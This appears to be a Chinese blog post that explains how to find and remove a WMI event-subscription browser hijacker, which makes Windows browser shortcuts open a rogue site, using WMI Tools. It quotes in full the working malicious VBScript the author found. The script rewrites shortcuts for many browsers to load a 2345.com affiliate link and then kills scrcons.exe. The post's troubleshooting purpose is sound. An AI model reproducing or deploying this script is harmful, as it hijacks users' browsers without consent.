关于解决WMI浏览器劫持问题--如果开了杀软可能打不开本页面，因为我贴了劫持脚本...

这里只说WMI的解决方法：

先说现象：

通过chrome快捷方式打开后（包括开始菜单和任务栏里的），直接会打开一个流氓网站

查看快捷方式发现“目标栏”里，启动路径最后多了那个流氓网站的地址，删除后，隔一段时间会再被加上去。

===================================================================================

这里说下排查方法

用进程监控软件或者火绒（我是用的火绒，不喜欢杀软的用前者），监控到每隔一小时scrcons.exe程序会去修改快捷方式。

 

网上关于这个程序解释很专业，理解有点难，我的理解是它类似cmd,wmi里的脚本程序通过它能达到修改系统的目的。

处理方法

去下载一个WMI Tools

微软官方下载连接404了，只能在第三方下，找个靠谱的软件网站下吧。

1、装好WMI Tools打开

2、点左上上角笔形按钮

3、输入 root\subscription，这个位置应该是会变的，因为我看其他人WMI劫持，2016年之前的路径都是root\CIMV2,随着时间推移，脚本制作者肯定也会再改变，一般来说会在root下面，我不是制作者，也对这个不熟，不敢保证，如果遇到scrcons.exe修改快捷方式的话，就到root下找吧。

4、进去以后会提示登录，只用点确定就行了。

5、最后会到达这样一个界面：（我的已经删了，在网上随便找的图方便理解）

每一个文件夹进去后都是这样，但是劫持脚本却不一定在这里，需要一一寻找，如图：

 这三个选项都要一一排查，所以排查工作是很累的事。（如果有什么好办法麻烦个我说下，我就是自己一个一个文件夹排查的）

有问题的项是这样的：

 

 这种前面有个蓝色方块的才是脚本，名字是没有规律的，这个我是在网上找的，我自己的已经删了，不是“unown_filter”这种一眼看上去就有问题的，我自己的是"syscheckmemXXX"所以不要光看名字，都要点进去看。

方法如下：

点击左侧_EventFilter:Name="unown_filter"，再至右侧右键点击ActiveScriptEventConsume r Name="unown"，右键选择view instant properties

然后看有没有，红色方框内的内容，没有就说明是正常的，有就需要仔细检查，我找了那么多文件件，还没找到过正常的，有ScripText项的蓝色方块。

 把里面内容复制出来，有问题的一眼就能看出来,这里贴下我自己的脚本：

Dim objFS:Set objFS = CreateObject("Scripting.FileSystemObject"):On Error Resume Next :Const link = " http://www.2345.com/?35488":browsers = Array("IEXPLORE.EXE", "chrome.exe","360chrome.exe","firefox.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe","chrome.exe","360chrome.exe"):Set BrowserDic = CreateObject("scripting.dictionary"):For Each browser In browsers:BrowserDic.Add LCase(browser), browser:Next:Dim FoldersDic(12):Set WshShell = CreateObject("Wscript.Shell"):FoldersDic(0) = "C:\Users\Public\Desktop":FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu":FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs":FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup":FoldersDic(4) = "C:\Users\Administrator.USER-20151224BY\Desktop":FoldersDic(5) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming\Microsoft\Windows\Start Menu":FoldersDic(6) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":FoldersDic(7) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup":FoldersDic(8) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming":FoldersDic(9) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":FoldersDic(10) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu":FoldersDic(11) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar":Set fso = CreateObject("Scripting.Filesystemobject"):For i = 0 To UBound(FoldersDic):For Each file In fso.GetFolder(FoldersDic(i)).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If BrowserDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:Next:createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0

========================================================================================

看内容基本一眼就看出问题了吧。

如果觉得以上方法很复杂，可以直接将浏览器快捷方式重命名，比如chrome.exe换成wochaxx.exe，应该不包含常见浏览器名字的关键字应该就不会被改了，但是你能忍受苍蝇在你喉咙的感觉么？